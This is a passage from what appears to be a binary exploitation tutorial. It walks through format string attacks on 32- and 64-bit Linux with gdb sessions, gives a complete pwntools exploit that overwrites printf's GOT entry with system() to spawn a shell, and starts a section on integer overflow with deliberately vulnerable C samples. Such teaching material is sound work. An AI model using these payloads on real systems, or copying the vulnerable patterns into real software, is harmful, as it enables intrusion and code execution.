0xffffd56c -> 0x43434343 (0xffffd53a) -> \x34
0xffffd570 -> 0x44444444 (0xffffd53b) -> \x12
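Replace the slots occupied by AAAA, BBBB, CCCC, and DDDD with the addresses in parentheses, then add padding bytes where needed to keep the 8-byte alignment. The input is constructed as follows: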
$ python2 -c 'print("\x38\xd5\xff\xff"+"\x39\xd5\xff\xff"+"\x3a\xd5\xff\xff"+"\x3b\xd5\xff\xff"+"%104c%13$hhn"+"%222c%14$hhn"+"%222c%15$hhn"+"%222c%16$hhn")' > text
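The first four parts are the 4 target addresses, taking 4*4=16 bytes. The last four parts each write one hexadecimal byte. Because the hh modifier is used, only the low byte of the running character count is kept: 0x78 (16+104=120 -> 0x78), 0x56 (120+222=342 -> 0x0156 -> 0x56), 0x34 (342+222=564 -> 0x0234 -> 0x34), and 0x12 (564+222=786 -> 0x0312 -> 0x12). The result is as follows: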
$ gdb -q a.out
Reading symbols from a.out...(no debugging symbols found)...done.
gdb-peda$ b printf
Breakpoint 1 at 0x8048350
gdb-peda$ r < text
Starting program: /home/firmy/Desktop/RE4B/a.out < text
[----------------------------------registers-----------------------------------]
EAX: 0xffffd564 --> 0xffffd538 --> 0x88888888
EBX: 0x804a000 --> 0x8049f14 --> 0x1
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd5f8 --> 0x0
ESP: 0xffffd52c --> 0x8048520 (<main+138>: add esp,0x20)
EIP: 0xf7e27c20 (<printf>: call 0xf7f06d17 <__x86.get_pc_thunk.ax>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0xf7e27c1b <fprintf+27>: ret
0xf7e27c1c: xchg ax,ax
0xf7e27c1e: xchg ax,ax
=> 0xf7e27c20 <printf>: call 0xf7f06d17 <__x86.get_pc_thunk.ax>
0xf7e27c25 <printf+5>: add eax,0x16f243
0xf7e27c2a <printf+10>: sub esp,0xc
0xf7e27c2d <printf+13>: mov eax,DWORD PTR [eax+0x124]
0xf7e27c33 <printf+19>: lea edx,[esp+0x14]
No argument
[------------------------------------stack-------------------------------------]
0000| 0xffffd52c --> 0x8048520 (<main+138>: add esp,0x20)
0004| 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x88888888
0008| 0xffffd534 --> 0x1
0012| 0xffffd538 --> 0x88888888
0016| 0xffffd53c --> 0xffffffff
0020| 0xffffd540 --> 0xffffd55a ("ABCD")
0024| 0xffffd544 --> 0xffffd564 --> 0xffffd538 --> 0x88888888
0028| 0xffffd548 --> 0x80481fc --> 0x38 ('8')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0xf7e27c20 in printf () from /usr/lib32/libc.so.6
gdb-peda$ x/20x $esp
0xffffd52c: 0x08048520 0xffffd564 0x00000001 0x88888888
0xffffd53c: 0xffffffff 0xffffd55a 0xffffd564 0x080481fc
0xffffd54c: 0x080484b0 0xf7ffda54 0x00000001 0x424135d0
0xffffd55c: 0x00004443 0x00000000 0xffffd538 0xffffd539
0xffffd56c: 0xffffd53a 0xffffd53b 0x34303125 0x33312563
gdb-peda$ finish
Run till exit from #0 0xf7e27c20 in printf () from /usr/lib32/libc.so.6
[----------------------------------registers-----------------------------------]
EAX: 0x312
EBX: 0x804a000 --> 0x8049f14 --> 0x1
ECX: 0x0
EDX: 0xf7f98830 --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd5f8 --> 0x0
ESP: 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x12345678
EIP: 0x8048520 (<main+138>: add esp,0x20)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048514 <main+126>: lea eax,[ebp-0x94]
0x804851a <main+132>: push eax
0x804851b <main+133>: call 0x8048350 <printf@plt>
=> 0x8048520 <main+138>: add esp,0x20
0x8048523 <main+141>: sub esp,0xc
0x8048526 <main+144>: push 0xa
0x8048528 <main+146>: call 0x8048370 <putchar@plt>
0x804852d <main+151>: add esp,0x10
[------------------------------------stack-------------------------------------]
0000| 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x12345678
0004| 0xffffd534 --> 0x1
0008| 0xffffd538 --> 0x12345678
0012| 0xffffd53c --> 0xffffffff
0016| 0xffffd540 --> 0xffffd55a ("ABCD")
0020| 0xffffd544 --> 0xffffd564 --> 0xffffd538 --> 0x12345678
0024| 0xffffd548 --> 0x80481fc --> 0x38 ('8')
0028| 0xffffd54c --> 0x80484b0 (<main+26>: add ebx,0x1b50)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x08048520 in main ()
gdb-peda$ x/20x $esp
0xffffd530: 0xffffd564 0x00000001 0x12345678 0xffffffff
0xffffd540: 0xffffd55a 0xffffd564 0x080481fc 0x080484b0
0xffffd550: 0xf7ffda54 0x00000001 0x424135d0 0x00004443
0xffffd560: 0x00000000 0xffffd538 0xffffd539 0xffffd53a
0xffffd570: 0xffffd53b 0x34303125 0x33312563 0x6e686824
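The padding arithmetic used for the byte-by-byte payload can be reproduced with a few lines of Python 3. This is only a sketch under the assumptions of this walkthrough (32-bit little-endian target, the four addresses placed at the very start of the buffer, the first address reachable as positional argument 13); the function name `build_hhn_payload` is made up for illustration and is not part of any library.

```python
import struct

def build_hhn_payload(target_addr, value, first_index, already_written=0):
    """Build a 32-bit format string that writes `value` to `target_addr`
    one byte at a time with %hhn (hypothetical helper for illustration).

    first_index is the positional index of the first address in the buffer
    (13 in the walkthrough).
    """
    # Four consecutive byte addresses, lowest byte first (little endian).
    payload = b"".join(struct.pack("<I", target_addr + i) for i in range(4))
    written = already_written + len(payload)

    for i in range(4):
        wanted = (value >> (8 * i)) & 0xFF
        # Characters still to print so that (written % 256) == wanted.
        pad = (wanted - written) % 256
        if pad == 0:
            pad = 256  # %c always prints at least one character
        payload += b"%%%dc%%%d$hhn" % (pad, first_index + i)
        written += pad
    return payload

print(build_hhn_payload(0xffffd538, 0x12345678, 13))
```

For the target 0x12345678 at 0xffffd538 this yields the same paddings as the hand-built input (104, 222, 222, 222), because each step only has to advance the character count modulo 256.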
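Finally, two points deserve emphasis:
- First, ASLR must be disabled system-wide. This keeps the stack stable from run to run, both under gdb and when the program is run directly, although the stack addresses in these two environments are not necessarily the same.
- Second, because the stack addresses under gdb differ from those seen when the program runs directly, we need to use the format string vulnerability to read memory and leak an address first, and then compute the real addresses from the leak.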
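Format string vulnerabilities on x86-64
On x64, most calling conventions pass arguments in registers. On Linux, the first six arguments are passed in RDI, RSI, RDX, RCX, R8, and R9; on Windows, the first four are passed in RCX, RDX, R8, and R9.
We use the same program as above, but this time compile it as a 64-bit binary: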
$ gcc -fno-stack-protector -no-pie fmt.c
Use AAAAAAAA%p.%p.%p.%p.%p.%p.%p.%p.%p.%p. as input:
gdb-peda$ n
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0xffffffff
RDX: 0x88888888
RSI: 0x1
RDI: 0x7fffffffe3d0 ("AAAAAAAA%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.")
RBP: 0x7fffffffe460 --> 0x400660 (<__libc_csu_init>: push r15)
RSP: 0x7fffffffe3c0 --> 0x4241000000000000 ('')
RIP: 0x400648 (<main+113>: call 0x4004e0 <printf@plt>)
R8 : 0x7fffffffe3c6 --> 0x44434241 ('ABCD')
R9 : 0xa ('\n')
R10: 0x7ffff7dd4380 --> 0x7ffff7dd0640 --> 0x7ffff7b9ed3a --> 0x636d656d5f5f0043 ('C')
R11: 0x246
R12: 0x400500 (<_start>: xor ebp,ebp)
R13: 0x7fffffffe540 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x40063d <main+102>: mov r8,rdi
0x400640 <main+105>: mov rdi,rax
0x400643 <main+108>: mov eax,0x0
=> 0x400648 <main+113>: call 0x4004e0 <printf@plt>
0x40064d <main+118>: mov edi,0xa
0x400652 <main+123>: call 0x4004d0 <putchar@plt>
0x400657 <main+128>: nop
0x400658 <main+129>: leave
Guessed arguments:
arg[0]: 0x7fffffffe3d0 ("AAAAAAAA%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.")
arg[1]: 0x1
arg[2]: 0x88888888
arg[3]: 0xffffffff
arg[4]: 0x7fffffffe3c6 --> 0x44434241 ('ABCD')
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe3c0 --> 0x4241000000000000 ('')
0008| 0x7fffffffe3c8 --> 0x4443 ('CD')
0016| 0x7fffffffe3d0 ("AAAAAAAA%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.")
0024| 0x7fffffffe3d8 ("%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.")
0032| 0x7fffffffe3e0 (".%p.%p.%p.%p.%p.%p.%p.")
0040| 0x7fffffffe3e8 ("p.%p.%p.%p.%p.")
0048| 0x7fffffffe3f0 --> 0x2e70252e7025 ('%p.%p.')
0056| 0x7fffffffe3f8 --> 0x1
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x0000000000400648 in main ()
gdb-peda$ x/10g $rsp
0x7fffffffe3c0: 0x4241000000000000 0x0000000000004443
0x7fffffffe3d0: 0x4141414141414141 0x70252e70252e7025
0x7fffffffe3e0: 0x252e70252e70252e 0x2e70252e70252e70
0x7fffffffe3f0: 0x00002e70252e7025 0x0000000000000001
0x7fffffffe400: 0x0000000000f0b5ff 0x00000000000000c2
gdb-peda$ c
Continuing.
AAAAAAAA0x1.0x88888888.0xffffffff.0x7fffffffe3c6.0xa.0x4241000000000000.0x4443.0x4141414141414141.0x70252e70252e7025.0x252e70252e70252e.
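In the final output, the first five values come from the registers RSI, RDX, RCX, R8, and R9; only the values after them are taken from the stack, and 0x4141414141414141 is at position %8$p. One more thing to note: we said that Linux uses 6 registers to pass arguments, yet only 5 are printed here. The reason is that one register, RDI, carries the format string itself; gdb shows that arg[0] is the format string passed in RDI. (If you go back to the x86 material, you will see that there the format string is passed on the stack, but it is likewise not printed.) Everything else works much as it does on x86, except that we can no longer modify arg2, because it is now held in a register.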
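The mapping between a positional specifier such as %8$p and its source on x86-64 Linux can be written down as a small Python 3 sketch. It assumes the System V AMD64 convention described above and takes RSP as it is right before `call printf`; the helper names are hypothetical.

```python
# Registers that carry printf's variadic arguments; RDI holds the format string.
REGISTER_ARGS = ["RSI", "RDX", "RCX", "R8", "R9"]

def printf_arg_source(n):
    """Where printf finds its n-th argument (n as in %n$p)."""
    if n < 1:
        raise ValueError("positional arguments are numbered from 1")
    if n <= len(REGISTER_ARGS):
        return REGISTER_ARGS[n - 1]
    # Remaining arguments are 8-byte stack slots starting at RSP at the call site.
    return "[rsp+0x%x]" % (8 * (n - len(REGISTER_ARGS) - 1))

def index_of_stack_address(addr, rsp_at_call):
    """Positional index whose slot is the 8-byte word stored at `addr`."""
    return (addr - rsp_at_call) // 8 + len(REGISTER_ARGS) + 1

# The buffer starts at 0x7fffffffe3d0 and RSP is 0x7fffffffe3c0 in the session above.
print(index_of_stack_address(0x7fffffffe3d0, 0x7fffffffe3c0))
```

With the addresses from the gdb session this gives 8, matching the position where 0x4141414141414141 appears in the output.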
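Format string vulnerabilities in CTFs
The pwntools pwnlib.fmtstr module
Documentation: http://pwntools.readthedocs.io/en/stable/fmtstr.html
This module provides tools for exploiting format string vulnerabilities. It defines a class, FmtStr, and a function, fmtstr_payload.
FmtStr automates format string exploitation: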
class pwnlib.fmtstr.FmtStr(execute_fmt, offset=None, padlen=0, numbwritten=0)
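- execute_fmt (function): function that interacts with the vulnerable process
- offset (int): offset of the first formatter you control
- padlen (int): size of the padding added before the payload
- numbwritten (int): number of bytes already written
fmtstr_payload automatically generates a format string payload: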
pwnlib.fmtstr.fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')
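- offset (int): offset of the first formatter you control
- writes (dict): of the form {addr: value, addr2: value2}; writes value to addr (a common choice: {printf_got: system_addr})
- numbwritten (int): number of bytes already written by printf
- write_size (str): must be byte, short, or int; selects whether to write byte by byte, short by short, or int by int (hhn, hn, or n)
Let's get familiar with the module through an example (arbitrary memory read and write): fmt.c fmt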
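#include <stdio.h>
#include <string.h>  // memset
#include <unistd.h>  // read
void main() {
    char str[1024];
    while(1) {
        memset(str, '\0', 1024);
        read(0, str, 1024);
        printf(str);  // user input is used directly as the format string
        fflush(stdout);
    }
}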
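To keep things simple, we disable ASLR and compile with the commands below, which turn off PIE so that the addresses of segments such as .text and .bss are fixed: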
# echo 0 > /proc/sys/kernel/randomize_va_space
$ gcc -m32 -fno-stack-protector -no-pie fmt.c
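The program obviously has a format string vulnerability. Our plan is to overwrite the GOT entry of printf() with the address of system(), so that the next time we enter /bin/sh we get a shell.
The first step is to compute the offset. pwntools makes it easy to build the exploit, but here we first show how to do it by hand and only then use pwntools. In gdb, set a breakpoint at main and run the program; by then libc has been loaded. Let's enter "AAAA":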
gdb-peda$ b main
...
gdb-peda$ r
...
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffffd1f0 ("AAAA\n")
EBX: 0x804a000 --> 0x8049f10 --> 0x1
ECX: 0xffffd1f0 ("AAAA\n")
EDX: 0x400
ESI: 0xf7f97000 --> 0x1bbd90
EDI: 0x0
EBP: 0xffffd5f8 --> 0x0
ESP: 0xffffd1e0 --> 0xffffd1f0 ("AAAA\n")
EIP: 0x8048512 (<main+92>: call 0x8048370 <printf@plt>)
EFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048508 <main+82>: sub esp,0xc
0x804850b <main+85>: lea eax,[ebp-0x408]
0x8048511 <main+91>: push eax
=> 0x8048512 <main+92>: call 0x8048370 <printf@plt>
0x8048517 <main+97>: add esp,0x10
0x804851a <main+100>: mov eax,DWORD PTR [ebx-0x4]
0x8048520 <main+106>: mov eax,DWORD PTR [eax]
0x8048522 <main+108>: sub esp,0xc
Guessed arguments:
arg[0]: 0xffffd1f0 ("AAAA\n")
[------------------------------------stack-------------------------------------]
0000| 0xffffd1e0 --> 0xffffd1f0 ("AAAA\n")
0004| 0xffffd1e4 --> 0xffffd1f0 ("AAAA\n")
0008| 0xffffd1e8 --> 0x400
0012| 0xffffd1ec --> 0x80484d0 (<main+26>: add ebx,0x1b30)
0016| 0xffffd1f0 ("AAAA\n")
0020| 0xffffd1f4 --> 0xa ('\n')
0024| 0xffffd1f8 --> 0x0
0028| 0xffffd1fc --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x08048512 in main ()
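The buffer passed to printf(), arg[0]: 0xffffd1f0 ("AAAA\n"), starts on the 5th row of the stack dump. Not counting the first row, which holds the format string pointer, the offset is 4.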
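The offset can also be derived from two addresses instead of counting rows. The Python 3 sketch below assumes a 32-bit cdecl call and takes ESP as it is right before `call printf`; `fmt_offset_32` is a hypothetical helper name.

```python
def fmt_offset_32(buffer_addr, esp_at_call):
    """Index n such that %n$x reads the first 4 bytes of the buffer.

    Slot 0 (at ESP) holds the format string pointer itself, so the slot
    number of the buffer is directly the positional offset.
    """
    delta = buffer_addr - esp_at_call
    if delta % 4:
        raise ValueError("buffer is not aligned to a 4-byte argument slot")
    return delta // 4

print(fmt_offset_32(0xffffd1f0, 0xffffd1e0))
```

The same formula applied to the earlier 32-bit example (buffer at 0xffffd564, ESP 0xffffd530 at the call site) gives 13, the index used in %13$n.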
Read the relocation table to get the GOT address of printf() (the first column, Offset):
$ readelf -r a.out
Relocation section '.rel.dyn' at offset 0x2f4 contains 2 entries:
Offset Info Type Sym.Value Sym. Name
08049ff8 00000406 R_386_GLOB_DAT 00000000 __gmon_start__
08049ffc 00000706 R_386_GLOB_DAT 00000000 stdout@GLIBC_2.0
Relocation section '.rel.plt' at offset 0x304 contains 5 entries:
Offset Info Type Sym.Value Sym. Name
0804a00c 00000107 R_386_JUMP_SLOT 00000000 read@GLIBC_2.0
0804a010 00000207 R_386_JUMP_SLOT 00000000 printf@GLIBC_2.0
0804a014 00000307 R_386_JUMP_SLOT 00000000 fflush@GLIBC_2.0
0804a018 00000507 R_386_JUMP_SLOT 00000000 __libc_start_main@GLIBC_2.0
0804a01c 00000607 R_386_JUMP_SLOT 00000000 memset@GLIBC_2.0
Get the virtual address of printf() in gdb:
gdb-peda$ p printf
$1 = {<text variable, no debug info>} 0xf7e26bf0 <printf>
Get the virtual address of system():
gdb-peda$ p system
$1 = {<text variable, no debug info>} 0xf7e17060 <system>
Now that we have shown how to collect by hand the information the exploit needs, here is the complete exploit built with pwntools:
# -*- coding: utf-8 -*-
from pwn import *
elf = ELF('./a.out')
r = process('./a.out')
libc = ELF('/usr/lib32/libc.so.6')
# Compute the offset
def exec_fmt(payload):
    r.sendline(payload)
    info = r.recv()
    return info
auto = FmtStr(exec_fmt)
offset = auto.offset
# Get the GOT address of printf
printf_got = elf.got['printf']
log.success("printf_got => {}".format(hex(printf_got)))
# Get the virtual address of printf
payload = p32(printf_got) + '%{}$s'.format(offset)
r.send(payload)
printf_addr = u32(r.recv()[4:8])
log.success("printf_addr => {}".format(hex(printf_addr)))
# Get the virtual address of system
system_addr = printf_addr - (libc.symbols['printf'] - libc.symbols['system'])
log.success("system_addr => {}".format(hex(system_addr)))
# Overwrite printf's GOT entry with the address of system
payload = fmtstr_payload(offset, {printf_got : system_addr})
r.send(payload)
# printf("/bin/sh") now ends up calling system("/bin/sh")
r.send('/bin/sh')
r.recv()
r.interactive()
$ python2 exp.py
[*] '/home/firmy/Desktop/RE4B/a.out'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
[+] Starting local process './a.out': pid 17375
[*] '/usr/lib32/libc.so.6'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[*] Found format string offset: 4
[+] printf_got => 0x804a010
[+] printf_addr => 0xf7e26bf0
[+] system_addr => 0xf7e17060
[*] Switching to interactive mode
$ echo "hacked!"
hacked!
This gives us a shell, and the addresses printed match the ones we obtained by hand exactly.
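The address arithmetic behind the system_addr computation is plain rebasing: the distance between two symbols inside libc is fixed, so one leaked address is enough. The Python 3 sketch below uses only the two addresses from the gdb session; since the real offsets of printf and system inside this libc are not given in the text, the example measures offsets relative to system, which is purely an illustrative assumption.

```python
def rebase(leaked_addr, leaked_offset, wanted_offset):
    """Runtime address of a symbol, given the runtime address of another
    symbol and both symbols' offsets from a common base."""
    base = leaked_addr - leaked_offset
    return base + wanted_offset

# Distance between the two symbols, taken from the gdb session.
PRINTF_MINUS_SYSTEM = 0xf7e26bf0 - 0xf7e17060

# Illustrative assumption: offsets measured from system itself
# (system at 0, printf at PRINTF_MINUS_SYSTEM).
print(hex(rebase(0xf7e26bf0, PRINTF_MINUS_SYSTEM, 0)))
```

Only the difference between the two offsets matters, which is why the exploit subtracts libc.symbols['printf'] - libc.symbols['system'] from the leaked printf address.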
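3.1.2 Integer Overflow
What is an integer overflow
Introduction
In the chapter on C language basics we covered the fundamentals of C integers; here we look at integer security issues in detail.
An integer is stored in a fixed-width region of memory, so the largest and smallest values it can hold are fixed. If we try to store a value greater than that maximum, an integer overflow occurs. (The x86-32 data model is ILP32: int, long, and pointer are all 32 bits.)
Dangers of integer overflow
If an integer is used to compute a sensitive value such as a buffer size or an array index, it becomes a potential hazard. An integer overflow usually does not overwrite additional memory by itself and does not directly lead to arbitrary code execution, but it can lead to stack overflows and heap overflows, both of which can result in arbitrary code execution. Integer overflows are also hard to notice right after they happen, and there is no easy, reliable way to tell whether one has occurred or may occur.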
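Integer overflow
There are three main kinds of anomalous integer behavior:
- Overflow
  - Only signed numbers overflow. The most significant bit of a signed number is the sign bit; adding two positive or two negative numbers can change the sign bit, producing an overflow.
  - The overflow flag OF detects signed overflow.
- Wraparound
  - An unsigned 0-1 becomes the largest value (255 for a 1-byte unsigned number), and 255+1 becomes the smallest value, 0.
  - The carry flag CF detects unsigned wraparound.
- Truncation
  - Storing a wider value in a narrower operand truncates the high-order bits.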
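Signed integer overflow
- Overflow past the maximum
int i;
i = INT_MAX; // 2 147 483 647
i++; // formally undefined behavior in C; wraps on typical x86 builds
printf("i = %d\n", i); // i = -2 147 483 648
- Underflow past the minimum
i = INT_MIN; // -2 147 483 648
i--;
printf("i = %d\n", i); // i = 2 147 483 647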
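Unsigned wraparound
A computation involving unsigned operands can never overflow, because a result that cannot be represented by the resulting unsigned integer type is reduced modulo the number that is one greater than the largest value that type can represent. Because of wraparound, an unsigned integer expression can never evaluate to less than zero.
Wraparound can be pictured as a wheel: incrementing a value moves clockwise to the value right next to it, and stepping past the largest value lands on 0:
unsigned int ui;
ui = UINT_MAX; // 4 294 967 295 on x86-32
ui++;
printf("ui = %u\n", ui); // ui = 0
ui = 0;
ui--;
printf("ui = %u\n", ui); // ui = 4 294 967 295 on x86-32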
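Python integers never overflow, which makes them convenient for modelling what a fixed-width register does. The Python 3 sketch below emulates 32-bit two's-complement and unsigned arithmetic with a mask; the helper names are made up for this illustration, and the signed case models the wrapping seen on typical x86 builds rather than anything the C standard guarantees.

```python
BITS = 32
MASK = (1 << BITS) - 1

def wrap_unsigned(x):
    """Reduce x modulo 2**32, as unsigned int arithmetic does."""
    return x & MASK

def wrap_signed(x):
    """Reinterpret the low 32 bits of x as a two's-complement int."""
    x &= MASK
    return x - (1 << BITS) if x & (1 << (BITS - 1)) else x

INT_MAX, INT_MIN, UINT_MAX = 2**31 - 1, -2**31, 2**32 - 1

print(wrap_signed(INT_MAX + 1))    # i++ at INT_MAX
print(wrap_signed(INT_MIN - 1))    # i-- at INT_MIN
print(wrap_unsigned(UINT_MAX + 1)) # ui++ at UINT_MAX
print(wrap_unsigned(0 - 1))        # ui-- at 0
```

The four printed values correspond to the four results shown in the C comments for the signed and unsigned cases.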
Truncation
- Truncation on addition:
0xffffffff + 0x00000001
= 0x0000000100000000 (long long)
= 0x00000000 (long)
- Truncation on multiplication:
0x00123456 * 0x00654321
= 0x000007336BF94116 (long long)
= 0x6BF94116 (long)
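Integer promotion and width overflow
Integer promotion means that when an expression contains operands of different widths, the narrower operand is promoted to the width of the wider one before the calculation is carried out; in C, operands narrower than int are first promoted to int.
Example: source code
#include <stdio.h>
void main() {
    int l;
    short s;
    char c;
    l = 0xabcddcba;
    s = l;  // keeps only the low 16 bits
    c = l;  // keeps only the low 8 bits
    printf("Width overflow\n");
    printf("l = 0x%x (%zu bits)\n", l, sizeof(l) * 8);
    printf("s = 0x%x (%zu bits)\n", s, sizeof(s) * 8);
    printf("c = 0x%x (%zu bits)\n", c, sizeof(c) * 8);
    printf("Integer promotion\n");
    printf("s + c = 0x%x (%zu bits)\n", s+c, sizeof(s+c) * 8);
}
$ ./a.out
Width overflow
l = 0xabcddcba (32 bits)
s = 0xffffdcba (16 bits)
c = 0xffffffba (8 bits)
Integer promotion
s + c = 0xffffdc74 (32 bits)
Use gdb to view the disassembly: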
gdb-peda$ disassemble main
Dump of assembler code for function main:
0x0000056d <+0>: lea ecx,[esp+0x4]
0x00000571 <+4>: and esp,0xfffffff0
0x00000574 <+7>: push DWORD PTR [ecx-0x4]
0x00000577 <+10>: push ebp
0x00000578 <+11>: mov ebp,esp
0x0000057a <+13>: push ebx
0x0000057b <+14>: push ecx
0x0000057c <+15>: sub esp,0x10
0x0000057f <+18>: call 0x470 <__x86.get_pc_thunk.bx>
0x00000584 <+23>: add ebx,0x1a7c
0x0000058a <+29>: mov DWORD PTR [ebp-0xc],0xabcddcba
0x00000591 <+36>: mov eax,DWORD PTR [ebp-0xc]
0x00000594 <+39>: mov WORD PTR [ebp-0xe],ax
0x00000598 <+43>: mov eax,DWORD PTR [ebp-0xc]
0x0000059b <+46>: mov BYTE PTR [ebp-0xf],al
0x0000059e <+49>: sub esp,0xc
0x000005a1 <+52>: lea eax,[ebx-0x1940]
0x000005a7 <+58>: push eax
0x000005a8 <+59>: call 0x400 <puts@plt>
0x000005ad <+64>: add esp,0x10
0x000005b0 <+67>: sub esp,0x4
0x000005b3 <+70>: push 0x20
0x000005b5 <+72>: push DWORD PTR [ebp-0xc]
0x000005b8 <+75>: lea eax,[ebx-0x1933]
0x000005be <+81>: push eax
0x000005bf <+82>: call 0x3f0 <printf@plt>
0x000005c4 <+87>: add esp,0x10
0x000005c7 <+90>: movsx eax,WORD PTR [ebp-0xe]
0x000005cb <+94>: sub esp,0x4
0x000005ce <+97>: push 0x10
0x000005d0 <+99>: push eax
0x000005d1 <+100>: lea eax,[ebx-0x191f]
0x000005d7 <+106>: push eax
0x000005d8 <+107>: call 0x3f0 <printf@plt>
0x000005dd <+112>: add esp,0x10
0x000005e0 <+115>: movsx eax,BYTE PTR [ebp-0xf]
0x000005e4 <+119>: sub esp,0x4
0x000005e7 <+122>: push 0x8
0x000005e9 <+124>: push eax
0x000005ea <+125>: lea eax,[ebx-0x190b]
0x000005f0 <+131>: push eax
0x000005f1 <+132>: call 0x3f0 <printf@plt>
0x000005f6 <+137>: add esp,0x10
0x000005f9 <+140>: sub esp,0xc
0x000005fc <+143>: lea eax,[ebx-0x18f7]
0x00000602 <+149>: push eax
0x00000603 <+150>: call 0x400 <puts@plt>
0x00000608 <+155>: add esp,0x10
0x0000060b <+158>: movsx edx,WORD PTR [ebp-0xe]
0x0000060f <+162>: movsx eax,BYTE PTR [ebp-0xf]
0x00000613 <+166>: add eax,edx
0x00000615 <+168>: sub esp,0x4
0x00000618 <+171>: push 0x20
0x0000061a <+173>: push eax
0x0000061b <+174>: lea eax,[ebx-0x18ea]
0x00000621 <+180>: push eax
0x00000622 <+181>: call 0x3f0 <printf@plt>
0x00000627 <+186>: add esp,0x10
0x0000062a <+189>: nop
0x0000062b <+190>: lea esp,[ebp-0x8]
0x0000062e <+193>: pop ecx
0x0000062f <+194>: pop ebx
0x00000630 <+195>: pop ebp
0x00000631 <+196>: lea esp,[ecx-0x4]
0x00000634 <+199>: ret
End of assembler dump.
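Integer conversions can lead to the following errors:
- Loss of value: converting to a type whose width cannot represent the value
- Loss of sign: converting from a signed type to an unsigned type, which loses the sign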
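The values printed by the width overflow example, and the two truncation calculations, can be re-derived without a compiler. The Python 3 sketch below models truncation with a mask and the movsx instructions from the disassembly with a sign extension; it assumes char is signed, as it is with gcc on x86, and the helper names are hypothetical.

```python
def truncate(value, bits):
    """Keep only the low `bits` bits (what a narrower store does)."""
    return value & ((1 << bits) - 1)

def sign_extend(value, bits):
    """Interpret the low `bits` bits as signed (what movsx does)."""
    value = truncate(value, bits)
    sign_bit = 1 << (bits - 1)
    return value - (1 << bits) if value & sign_bit else value

def as_hex32(value):
    """Format a value the way printf("%x") shows a promoted 32-bit int."""
    return "0x%x" % (value & 0xFFFFFFFF)

l = 0xabcddcba
s = sign_extend(l, 16)  # short s = l;
c = sign_extend(l, 8)   # char c = l; (char assumed signed)
print(as_hex32(s), as_hex32(c), as_hex32(s + c))

# The two truncation examples: 64-bit results cut down to 32 bits.
print(hex(truncate(0xffffffff + 0x00000001, 32)))
print(hex(truncate(0x00123456 * 0x00654321, 32)))
```

Both short and char lose the high bits of l first (loss of value) and are then sign-extended when promoted to int, which is why the printed values start with ffff.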
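Functions prone to these bugs
As noted, an integer overflow is only useful in combination with another kind of flaw. Both functions below take a parameter of type size_t that is often misused, producing an integer overflow that can then lead to a buffer overflow.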
#include <string.h>
void *memcpy(void *dest, const void *src, size_t n);
memcpy() copies the first n bytes starting at the address src into the array pointed to by dest, and returns dest.
#include <string.h>
char *strncpy(char *dest, const char *src, size_t n);
strncpy() copies at most n bytes from the string at src to the memory starting at dest.
Both functions take a parameter of type size_t, the unsigned integer type of the result of the sizeof operator.
typedef unsigned int size_t;
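Integer overflow examples
Now that we know the principle and main forms of integer overflow, let's look at a few simple examples and then actually exploit an integer overflow vulnerability.
Examples
Example 1, integer conversion:
char buf[80];
void vulnerable() {
    int len = read_int_from_network();
    char *p = read_string_from_network();
    if (len > 80) {
        error("length too large: bad dog, no cookie for you!");
        return;
    }
    memcpy(buf, p, len);
}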
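The problem in this example is that if the attacker supplies a negative len, it slips past the if check. When execution reaches memcpy(), whose third parameter has type size_t, the negative len is converted to an unsigned integer, which can be a very large positive number. A huge amount of data is then copied into buf, causing a buffer overflow.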
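The gap between the signed check and the unsigned use can be made concrete with a short Python 3 sketch. It assumes a 32-bit size_t as on x86-32; both helper names are hypothetical stand-ins for the comparison and for the implicit int to size_t conversion.

```python
SIZE_T_BITS = 32  # x86-32 (ILP32)

def passes_check(length):
    """The signed comparison from the example: only len > 80 is rejected."""
    return not (length > 80)

def as_size_t(length):
    """Value memcpy() sees after the implicit int -> size_t conversion."""
    return length % (1 << SIZE_T_BITS)

for candidate in (80, 81, -1):
    print(candidate, passes_check(candidate), hex(as_size_t(candidate)))
```

A len of -1 passes the check yet reaches memcpy() as 0xffffffff, far beyond the 80 bytes of buf.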
Example 2, wraparound and overflow:
void vulnerable() {
    size_t len;
    // int len;
    char* buf;
    len = read_int_from_network();
    buf = malloc(len + 5);
    read(fd, buf, len);
    ...
}
This example appears to avoid the buffer overflow problem, but if len is too large, len+5 can wrap around. For example, on x86-32, if len = 0xFFFFFFFF then len+5 = 0x00000004; malloc() allocates only 4 bytes, a large amount of data is then written into that region, and the buffer overflows. (If len is declared as a signed int instead, len+5 can overflow.)
Example 3, truncation:
void main(int argc, char *argv[]) {
    unsigned short int total;
    total = strlen(argv[1]) + strlen(argv[2]) + 1;
    char *buf = (char *)malloc(total);
    strcpy(buf, argv[1]);
    strcat(buf, argv[2]);
    ...
}
